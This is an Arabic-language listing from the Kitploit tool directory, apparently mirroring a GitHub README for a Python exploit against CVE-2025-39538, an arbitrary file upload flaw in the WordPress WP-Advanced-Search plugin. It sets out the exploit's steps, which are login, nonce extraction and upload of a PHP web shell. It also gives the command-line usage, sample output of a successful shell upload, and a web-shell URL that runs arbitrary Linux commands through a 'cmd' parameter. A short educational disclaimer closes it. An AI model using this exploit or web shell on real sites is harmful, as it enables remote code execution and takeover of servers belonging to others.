Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-39538 — WordPress WP-Advanced-Search <= 3.3.9.3 - ثغرة رفع ملفات اعتباطية | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-39538
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2025-39538

CVE-2025-39538

WordPress WP-Advanced-Search <= 3.3.9.3 - ثغرة رفع ملفات اعتباطية

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🛡️ CVE-2025-39538 - WordPress WP-Advanced-Search <= 3.3.9.3 رفع ملفات تعسفي

CVE-2025-39538
تاريخ النشر: 2025-04-16
نوع الثغرة: رفع ملفات تعسفي (رفع غير مقيد لملف بنوع خطير)
الإضافة المتأثرة: WP-Advanced-Search من إعداد Mathieu Chartier
الإصدارات المتأثرة: جميع الإصدارات حتى 3.3.9.3 وما يشملها

تسمح هذه الثغرة لمهاجم مُصادَق برفع ملف PHP خبيث (مثل قشرة ويب) إلى الخادم باستخدام وظيفة الاستيراد التي توفرها الإضافة. يتم وضع الملف المرفوع داخل دليل uploads الخاص بـ WordPress وقد يؤدي ذلك إلى تنفيذ أكواد عن بُعد.

🧱 مسار الرفع:

root@kitploit:~
wp-content/uploads/2025/04/

⚙️ حول سكربت الاستغلال

يقوم هذا السكربت المكتوب بلغة Python بالإجراءات التالية:

  1. تسجيل الدخول إلى موقع WordPress باستخدام بيانات الاعتماد المقدمة.
  2. استخراج الرمز wp_advanced_search_up_nonce المطلوب من صفحة الاستيراد/التصدير في لوحة التحكم.
  3. رفع قشرة ويب (ملف PHP) عبر طلب POST مُصمَّم خصيصًا.

🚀 طريقة الاستخدام

root@kitploit:~
usage: a.py [-h] -u URL -un USERNAME -p PASSWORD

CVE-2025-39538 - WP Advanced Search Arbitrary File Upload Exploit # By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g., http://127.0.0.1/wordpress)
  -un, --username USERNAME
                        WordPress Username
  -p, --password PASSWORD
                        WordPress Password

🖥️ مثال على المخرجات:

root@kitploit:~
[*] Attempting login...
[+] Logged in successfully.
[*] Fetching nonce from import/export page...
[+] Nonce extracted: 2140855687
[*] Attempting to upload shell...
[+] File uploaded (check wp-content/uploads or temp directory).

🐚 استخدام القشرة المرفوعة

بعد الرفع، يمكنك الوصول إلى القشرة بهذه الطريقة:

root@kitploit:~
http://target.site/wp-content/uploads/2025/04/nxploit.php?cmd=whoami

استبدل whoami بأي أمر Linux تريد تنفيذه، على سبيل المثال:

  • id — يعرض معرف المستخدم الحالي.
  • pwd — يعرض الدليل الحالي.
  • ls — يسرد الملفات.

⚠️ إخلاء مسؤولية


هذه الأداة مخصصة لأغراض تعليمية ولاختبارات الاختراق المصرح بها فقط.
المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا السكربت.


بواسطة: Nxploited | Khaled Alenazi

تنزيل الأداة